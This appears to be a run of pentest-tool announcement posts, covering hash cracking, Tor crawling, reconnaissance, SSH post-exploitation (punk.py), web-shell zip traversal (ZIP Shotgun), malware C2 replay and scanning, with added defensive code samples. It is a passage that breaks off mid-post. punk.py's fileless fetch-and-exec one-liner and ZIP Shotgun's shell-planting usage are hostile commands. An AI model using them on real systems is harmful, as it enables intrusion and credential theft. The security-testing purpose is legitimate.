Hashie – Crack Hashes In A Blink Of An Eye

Hashie is a multi-functional tool written in Python to deal with hashes.

Features
- Hash cracking.
- Hash generation.
- Automatic hash type identification.
- Supports MD5, SHA1, SHA256, SHA384, SHA512 etc.

How to Install and Run in Linux
[1] Enter the following command in the terminal to download it:
    git clone https://github.com/Sameera-Madhushan/Hashie
[2] After downloading the program, enter the following command to navigate to the Hashie directory and list its contents:
    cd Hashie && ls
[3] Install dependencies:
    pip3 install -r requirements.txt
[4] Now run the script with the following command:
    python3 hashie.py

How to Install and Run in Windows
[1] Download and run the Python 2.7.x and Python 3.7 setup files from Python.org. In the Python 3.7 installer, enable "Add Python 3.6 to PATH".
[2] Download and run the Git setup file from Git-scm.com and choose "Use Git from Windows Command Prompt".
[3] After that, run Command Prompt and enter these commands:
    git clone https://github.com/Sameera-Madhushan/Hashie
    cd Hashie
    pip3 install -r requirements.txt
    python3 hashie.py

Download Hashie
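The "automatic hash type identification" and "hash generation" features above come down to two checks a practitioner can reproduce with the standard library: a hex digest's length and character set narrow the algorithm down to a candidate list, and hashing known input under each candidate confirms which one actually produced it. The following is an added example (not Hashie's own code) covering the digest families the page lists; the candidate table and the constant-time comparison are this example's own choices, and identification by length alone is deliberately reported as a candidate list because equal-length digests (for instance other 128-bit hashes beside MD5) cannot be told apart from the string itself.

```python
import hashlib
import hmac

# Candidate algorithms per hex-digest length, restricted to the digest families
# the page names. Length and charset alone cannot separate algorithms with the
# same output size, so identification returns every candidate rather than one.
CANDIDATES_BY_LENGTH = {
    32: ["MD5"],
    40: ["SHA1"],
    64: ["SHA256"],
    96: ["SHA384"],
    128: ["SHA512"],
}

# Mapping from the display names above to hashlib's constructor names.
HASHLIB_NAMES = {
    "MD5": "md5", "SHA1": "sha1", "SHA256": "sha256",
    "SHA384": "sha384", "SHA512": "sha512",
}

HEX_CHARS = set("0123456789abcdefABCDEF")


def identify_hash(digest: str) -> list:
    """Return the candidate algorithm names for a hex digest, or [] when the
    string is not a plausible hex digest of a supported algorithm."""
    digest = digest.strip()
    if not digest or any(c not in HEX_CHARS for c in digest):
        return []
    return list(CANDIDATES_BY_LENGTH.get(len(digest), []))


def generate_hash(algorithm: str, data: bytes) -> str:
    """Hex digest of `data` under one of the supported algorithms."""
    return hashlib.new(HASHLIB_NAMES[algorithm.upper()], data).hexdigest()


def verify_hash(algorithm: str, data: bytes, expected_hex: str) -> bool:
    """True if `data` hashes to `expected_hex` under `algorithm`. compare_digest
    keeps the comparison time independent of where the first mismatch is."""
    return hmac.compare_digest(generate_hash(algorithm, data), expected_hex.strip().lower())


def match_algorithms(digest: str, data: bytes) -> list:
    """Of the algorithms identify_hash() suggests for `digest`, return those
    under which `data` really hashes to it (the confirmation step)."""
    return [alg for alg in identify_hash(digest) if verify_hash(alg, data, digest)]


if __name__ == "__main__":
    # Constructed sample: the SHA256 digest of the word "example".
    sample = generate_hash("SHA256", b"example")
    print("candidates:", identify_hash(sample))
    print("confirmed :", match_algorithms(sample, b"example"))
    print("rejected  :", identify_hash("not-a-hash"))
```

Running the block stand-alone prints the candidate list for a constructed SHA256 digest, the confirmed algorithm once the known input is hashed, and an empty list for a non-hex string.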

Link: http://feedproxy.google.com/~r/PentestTools/~3/YG5JSwlXNz0/hashie-crack-hashes-in-blink-of-eye.html

Deep Explorer – Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained

Dependencies
    pip3 install -r requirements.txt
You should also have Tor installed.

Usage
    python3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWL

Examples:
    python3 deepexplorer.py "legal thing" 40 default legal
(will crawl if the results obtained in the browser do not reach 40; the script will also show links whose HTML contains the string "legal" [like the intext dork in Google])
    python3 deepexplorer.py "ilegal thing" 30 all dni
(will crawl every link obtained in the browser [until it reaches 30]; the script will also show links whose HTML contains the string "dni" [like the intext dork in Google])
    python3 deepexplorer.py "legal thing" 30 none
(do not crawl, only obtain links from the browser)

About
Deep Explorer is a tool designed to search (any) thing in a few seconds.
Any idea, failure etc. please report to Telegram: blueudp
results.txt contains the results obtained in the previous search.
Tested in ParrotOS and Kali Linux 2.0.

Type of Errors
Error importing... -> You should try a manual pip install of the package.
Error connecting to server -> Can't connect to the Ahmia browser.
If Deep Explorer cannot execute "service ...", do it manually; Deep Explorer checks the Tor instance at the beginning, so it will skip that part.

Contact
Name: Eduardo Pérez-Malumbres
Telegram: @blueudp
Twitter: https://twitter.com/blueudp

Download Deep-Explorer

Link: http://feedproxy.google.com/~r/PentestTools/~3/Uky3GEJ7r8k/deep-explorer-tool-which-purpose-is.html

R3Con1Z3R – A Lightweight Web Information Gathering Tool With An Intuitive Features (OSINT)

R3con1z3r is a lightweight web information gathering tool with intuitive features, written in Python. It provides a powerful environment in which open source intelligence (OSINT) web-based footprinting can be conducted quickly and thoroughly. Footprinting is the first phase of ethical hacking; it is the collection of every possible piece of information regarding the target. R3con1z3r is a passive reconnaissance tool with built-in functionalities which include: HTTP header flag, Traceroute, Whois footprinting, DNS information, sites on the same server, Nmap port scanner, reverse target and hyperlinks on a webpage. The tool, after being provided with the necessary inputs, generates an output in HTML format.

Installation
r3con1z3r supports Python 2 and Python 3.
    $ git clone https://github.com/abdulgaphy/r3con1z3r.git
    $ cd r3con1z3r
    $ pip install -r requirements.txt
Optional for Linux users:
    $ sudo chmod +x r3con1z3r.py

Modules
r3con1z3r depends only on the sys and the requests Python modules.
Python 3:
    $ pip3 install -r requirements.txt
For coloring on Windows:
    pip install win_unicode_console colorama

Usage
    python3 r3con1z3r.py [domain.com]

Examples
To run on all operating systems (Linux, Windows, Mac OS X, Android etc.), i.e. in a Python 2 environment:
    python r3con1z3r.py google.com
To run in a Python 3 environment:
    python3 r3con1z3r.py facebook.com
To run as an executable (Unix only):
    ./r3con1z3r.py google.com

Download R3Con1Z3R

Link: http://feedproxy.google.com/~r/PentestTools/~3/xpd1vC23W3c/r3con1z3r-lightweight-web-information.html

Punk.Py – Unix SSH Post-Exploitation Tool

unix SSH post-exploitation 1337 tool

How it works
punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collects usernames, SSH keys and known hosts from a unix system, then tries to connect via SSH to all the combinations found. punk.py is written to work on standard python2 installations.

Examples
Standard execution:
    ~$ ./punk.py
Skip passwd checks and use a custom home path:
    ~$ ./punk.py --no-passwd --home /home/ldapusers/
Execute commands with sudo:
    ~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
One-liner fileless (with the --no-passwd parameter):
    ~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd

TODO
- Improve private key hunting, including dsa keys
- Recursion
- SSH keys with password bruteforce
- Hashed known_hosts bruteforce ( https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/ )

Download Punk.Py

Link: http://feedproxy.google.com/~r/PentestTools/~3/5T_W704vAXw/punkpy-unix-ssh-post-exploitation-tool.html

ZIP Shotgun – Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. The idea for this script comes from this post on the Silent Signal Techblog, "Compressed File Upload And Command Execution", and from OWASP, "Test Upload of Malicious Files".

This script will create an archive which contains files with "../" in the filename. When extracting, this could cause files to be extracted to preceding directories. It can allow an attacker to extract shells to directories which can be accessed from a web browser.

The default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HERE.

Installation
Install using Python pip:
    pip install zip-shotgun --upgrade
Clone the git repository and install:
    git clone https://github.com/jpiechowka/zip-shotgun.git
Execute from the root directory of the cloned repository (where the setup.py file is located):
    pip install . --upgrade

Usage and options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
  --version                        Show the version and exit.
  -c, --directories-count INTEGER  Count of how many directories to go back inside the zip file (e.g. 3 means that 3 files will be added to the zip: shell.php, ../shell.php and ../../shell.php, where shell.php is the name of the shell you provided or a randomly generated value) [default: 16]
  -n, --shell-name TEXT            Name of the shell inside the generated zip file (e.g. shell). If not provided it will be randomly generated. Cannot have whitespace.
  -f, --shell-file-path PATH       A file that contains the code for the shell. If this option is not provided, the wwwolf (https://github.com/WhiteWinterWolf/wwwolf-php-webshell) PHP shell will be added instead. If a name is provided it will be added to the zip with the provided name; otherwise the name will be randomly generated.
  --compress                       Enable compression. If this flag is set, the archive will be compressed using the DEFLATE algorithm with compression level 9. By default no compression is applied.
  -h, --help                       Show this message and exit.

Examples

Using all default options:
    zip-shotgun archive.zip
Part of the script output:
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL

Using default options and enabling compression for the archive file:
    zip-shotgun --compress archive.zip
Part of the script output:
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL

Using default options but changing the number of directories to go back in the archive to 3:
    zip-shotgun --directories-count 3 archive.zip
    zip-shotgun -c 3 archive.zip
The script will write 3 files in total to the archive.
Part of the script output:
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
    12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL

Using default options but providing the shell name inside the archive and enabling compression (the shell name cannot have whitespace):
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
The name for the shell files inside the archive will be set to the one provided by the user.
Part of the script output:
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php
    ...
    12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL

Provide a custom shell file but use a random name inside the archive. Set the directories count to 3:
    zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c 3 -f ./custom-shell.php archive.zip
The shell code will be extracted from the user-provided file. Names inside the archive will be randomly generated.
Part of the script output:
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL

Provide a custom shell file and set the shell name to save inside the archive. Set the directories count to 3 and use compression:
    zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
The shell code will be extracted from the user-provided file. Names inside the archive will be set to the user-provided name.
Part of the script output:
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URL

Download Zip-Shotgun
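The archives described above are only dangerous to an extractor that trusts member names. The other side of this test, the check an upload handler should apply before unpacking, is shown in the following added example (not part of zip-shotgun or of the original post). It audits an archive for the two signals the script's log lines expose, "../" components in member names and chmod 777 permission bits, and extracts only members that resolve inside the destination, refusing the whole archive on the first traversal entry. The fixture archive is constructed in memory with the same layout the log shows (the same name at zero, one and two parent levels, mode 777) but with a harmless placeholder as content; the size cap and the "reject any '..' component" rule are this example's own design choices.

```python
import io
import os
import tempfile
import zipfile


def entry_escapes(name: str) -> bool:
    """True if a member name could land outside the extraction root: absolute
    path, Windows drive letter, or any '..' path component (rejected even when
    a later component would bring the path back inside)."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        return True
    return ".." in norm.split("/")


def audit_zip(data: bytes) -> list:
    """Inspect an archive without extracting it. Returns (member, reason) pairs
    for traversal names and for members carrying executable permission bits
    (the archives above store every file as chmod 777, itself a useful signal)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if entry_escapes(info.filename):
                findings.append((info.filename, "path traversal"))
            mode = (info.external_attr >> 16) & 0o777  # unix mode sits in the high 16 bits
            if mode & 0o111:
                findings.append((info.filename, "executable bits set (mode %o)" % mode))
    return findings


def safe_extract(data: bytes, dest: str, max_member_bytes: int = 10 * 1024 * 1024) -> list:
    """Extract members that stay inside dest. Rejects the whole archive on the
    first traversal name (a poisoned upload should not be partially applied),
    ignores the stored permission bits, and caps each member's size."""
    dest_root = os.path.realpath(dest)
    extracted = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if entry_escapes(info.filename):
                raise ValueError("refusing archive: traversal entry %r" % info.filename)
            if info.file_size > max_member_bytes:
                raise ValueError("refusing archive: member %r too large" % info.filename)
            target = os.path.realpath(os.path.join(dest_root, info.filename.replace("\\", "/")))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError("refusing archive: %r resolves outside dest" % info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            # The file is created under the process umask; the archive's 777 is never applied.
            # The header's file_size was checked above, but the stream is still read with a cap
            # in case the header lies.
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read(max_member_bytes))
            extracted.append(os.path.relpath(target, dest_root))
    return extracted


def try_extract(data: bytes):
    """Run safe_extract into a throwaway directory; returns the extracted paths,
    or the refusal message if the archive was rejected."""
    with tempfile.TemporaryDirectory() as d:
        try:
            return safe_extract(data, d)
        except ValueError as e:
            return str(e)


def build_sample_archive(shell_name: str = "shell.php", directories_count: int = 3) -> bytes:
    """Constructed fixture with the layout the zip-shotgun log shows (same name
    at 0, 1, 2 parent levels, mode 777). Content is a harmless placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for depth in range(directories_count):
            info = zipfile.ZipInfo("../" * depth + shell_name)
            info.external_attr = 0o777 << 16
            zf.writestr(info, b"placeholder content")
    return buf.getvalue()


if __name__ == "__main__":
    poisoned = build_sample_archive()
    for member, reason in audit_zip(poisoned):
        print("%-20s %s" % (member, reason))
    print(try_extract(poisoned))
```

Run stand-alone, the block lists the traversal and permission findings for the constructed archive and then prints the refusal message from `safe_extract`; an archive with `directories_count=1` passes the traversal check and extracts as a single `shell.php` inside the temporary directory.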

Link: http://feedproxy.google.com/~r/PentestTools/~3/zgU6TcdSSH8/zip-shotgun-utility-script-to-test-zip.html

imaginaryC2 – Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware

Author: Felix Weyne (website) (Twitter)

Imaginary C2 is a Python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts an HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.

By using this tool, an analyst can feed the malware consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can capture and inspect HTTP requests towards a domain/IP which is offline at the time of the analysis.

Replay packet captures
Imaginary C2 provides two scripts to convert packet captures (PCAPs) or Fiddler Session Archives into request definitions which can be parsed by Imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request.

Technical details
Requirements: Imaginary C2 requires Python 2.7 and Windows.

Modules: currently, Imaginary C2 contains three modules and two configuration files:
1. imaginary_c2.py - Hosts Python's simple HTTP server. Main module.
2. redirect_to_imaginary_c2.py - Alters Windows' hosts file and Windows' (IP) routing table.
3. unpack_fiddler_archive.py & unpack_pcap.py - Extract HTTP responses from packet captures and add the corresponding HTTP request domains and URLs to the configuration files.
4. redirect_config.txt - Contains the domains and IPs which need to be redirected to localhost (to the Python HTTP server).
5. requests_config.txt - Contains URL path definitions with the corresponding data sources.

Request definitions: each (HTTP) request defined in the request configuration consists of two parameters:

Parameter 1: HTTP request URL path (a.k.a. urlType)
- fixed: define the URL path as a literal string
- regex: define a regex pattern to be matched on the URL path

Parameter 2: HTTP response source (a.k.a. sourceType)
- data: Imaginary C2 will respond with the contents of a file on disk
- python: Imaginary C2 will run a Python script. The output of the Python script defines the HTTP response.

Demo use case: simulating TrickBot servers
Imaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot's web injection servers.

How it works:
Upon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The TrickBot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a svchost.exe instance.

One of TrickBot's plugins is called injectdll, a plugin which is responsible for TrickBot's webinjects. The injectdll plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a webfake server is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the webfake server. The webfake server hosts a replica of the targeted website. This replica website is usually used in a social-engineering attack to defraud the victim.

Imaginary C2 in action:
The video below shows the TrickBot downloader running inside svchost.exe and connecting to Imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned svchost.exe instance. The webinject module tries to steal the browser's saved passwords and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the webfake server. In the demo, the webfake server hosts the message: "Default imaginary C2 server response" (full video).

Download imaginaryC2
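The request-definition model above (a urlType of fixed or regex paired with a sourceType of data or python) is the part an analyst has to get right when replaying captured traffic, so the following added example shows the matching and dispatch logic behind it. This is not Imaginary C2's code: the definitions are constructed in Python rather than read from requests_config.txt, a "data" source is an in-memory byte string standing in for a file on disk, a "python" source is a callable standing in for a script, regex matching is assumed to be a whole-path match and the first matching definition is assumed to win. The default reply string is the one the demo video shows, and every request is recorded so that traffic towards a domain that is offline can still be inspected.

```python
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Reply used when no definition matches (the message the page's demo shows).
DEFAULT_RESPONSE = b"Default imaginary C2 server response"


class RequestDefinition:
    """One request-configuration entry: urlType ('fixed' or 'regex') plus
    sourceType ('data' = static bytes standing in for a file on disk,
    'python' = a callable standing in for a script whose output is the reply)."""

    def __init__(self, url_type, url_value, source_type, source):
        if url_type not in ("fixed", "regex"):
            raise ValueError("unknown urlType: %r" % url_type)
        if source_type not in ("data", "python"):
            raise ValueError("unknown sourceType: %r" % source_type)
        self.url_type, self.url_value = url_type, url_value
        self.source_type, self.source = source_type, source
        self._pattern = re.compile(url_value) if url_type == "regex" else None

    def matches(self, path: str) -> bool:
        if self.url_type == "fixed":
            return path == self.url_value
        return self._pattern.fullmatch(path) is not None  # assumption: whole-path match

    def response(self, path: str) -> bytes:
        if self.source_type == "data":
            return self.source
        return self.source(path)


class Responder:
    """Resolves a request path against the definitions (first match wins, an
    assumption) and records every (host, path) so off-line traffic can be reviewed."""

    def __init__(self, definitions, default=DEFAULT_RESPONSE):
        self.definitions = list(definitions)
        self.default = default
        self.captured = []

    def handle(self, host: str, path: str) -> bytes:
        self.captured.append((host, path))
        for definition in self.definitions:
            if definition.matches(path):
                return definition.response(path)
        return self.default


def make_handler(responder: Responder):
    """Bind a Responder to a minimal GET handler for http.server."""

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = responder.handle(self.headers.get("Host", ""), self.path)
            self.send_response(200)
            self.send_header("Content-Type", "application/octet-stream")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, fmt, *args):  # requests are kept in responder.captured instead
            pass

    return Handler


def build_demo_responder() -> Responder:
    """Constructed definitions mirroring the demo layout described on the page
    (a configuration file fetch and a module download); the payloads are dummies."""
    definitions = [
        RequestDefinition("fixed", "/config.txt", "data", b"<constructed config bytes>"),
        RequestDefinition("regex", r"/modules/(\w+)\.bin", "python",
                          lambda path: ("module:" + path.rsplit("/", 1)[1]).encode()),
    ]
    return Responder(definitions)


def serve(responder: Responder, port: int = 8000) -> None:
    """Serve the responder on localhost (blocks); requests end up in responder.captured."""
    HTTPServer(("127.0.0.1", port), make_handler(responder)).serve_forever()


if __name__ == "__main__":
    demo = build_demo_responder()
    print(demo.handle("example.invalid", "/config.txt"))
    print(demo.handle("example.invalid", "/modules/inject.bin"))
    print(demo.handle("example.invalid", "/unknown"), demo.captured)
    serve(demo)
```

Run stand-alone, the block prints the three dispatch outcomes (static data, script output, default reply) and the captured request list, then serves the same responder on 127.0.0.1:8000 until interrupted.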

Link: http://feedproxy.google.com/~r/PentestTools/~3/V0gucmHB1Ec/imaginaryc2-tool-which-aims-to-help-in.html

Celerystalk – An Asynchronous Enumeration and Vulnerability Scanner

celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.

- Configurable - Some common tools are in the default config, but you can add any tool you want
- Service Aware - Uses nmap/nessus service names rather than port numbers to decide which tools to run
- Scalable - Designed for scanning multiple hosts, but works well for scanning one host at a time
- VirtualHosts - Supports subdomain recon and virtualhost scanning
- Job Control - Supports canceling, pausing, and resuming of tasks, inspired by Burp scanner
- Screenshots - Automatically takes screenshots of every url identified via brute force (gobuster) and spidering (Photon)

Install/Setup
Supported Operating Systems: Kali
Supported Python Version: 2.x
You must install and run celerystalk as root.
    # git clone https://github.com/sethsec/celerystalk.git
    # cd celerystalk/setup
    # ./install.sh
    # cd ..
    # ./celerystalk -h

Using celerystalk - The basics

[CTF/HackTheBox mode] - How to scan a host by IP
    # nmap 10.10.10.10 -Pn -p- -sV -oX tenten.xml                          # Run nmap
    # ./celerystalk workspace create -o /htb                                # Create default workspace and set output dir
    # ./celerystalk import -f tenten.xml                                    # Import scan
    # ./celerystalk db services                                             # If you want to see what services were loaded
    # ./celerystalk scan                                                    # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c)                               # Watch scans as they move from pending > running > complete
    # ./celerystalk report                                                  # Generate report
    # firefox /htb/celerystalkReports/Workspace-Report[Default].html &      # View report

[Vulnerability Assessment Mode] - How to scan a list of in-scope hosts/networks and any subdomains that resolve to any of the in-scope IPs
    # nmap -iL client-inscope-list.txt -Pn -p- -sV -oX client.xml          # Run nmap
    # ./celerystalk workspace create -o /assessments/client                 # Create default workspace and set output dir
    # ./celerystalk import -f client.xml -S scope.txt                       # Import scan and scope files
    # ./celerystalk subdomains -d client.com,client.net                     # Find subdomains and determine if in scope
    # ./celerystalk scan                                                    # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c)                               # Wait for scans to finish
    # ./celerystalk report                                                  # Generate report
    # firefox /celerystalkReports/Workspace-Report[Default].html &          # View report

[URL Mode] - How to scan a URL (use this mode to scan sub-directories found during the first wave of scans).
    # ./celerystalk workspace create -o /assessments/client                 # Create default workspace and set output dir
    # ./celerystalk scan -u http://10.10.10.10/secret_folder/               # Run all enabled commands
    # ./celerystalk query watch (then Ctrl+c)                               # Wait for scans to finish
    # ./celerystalk report                                                  # Generate report
    # firefox <path>/celerystalkReports/Workspace-Report[Default].html &    # View report

Using celerystalk - Some more detail

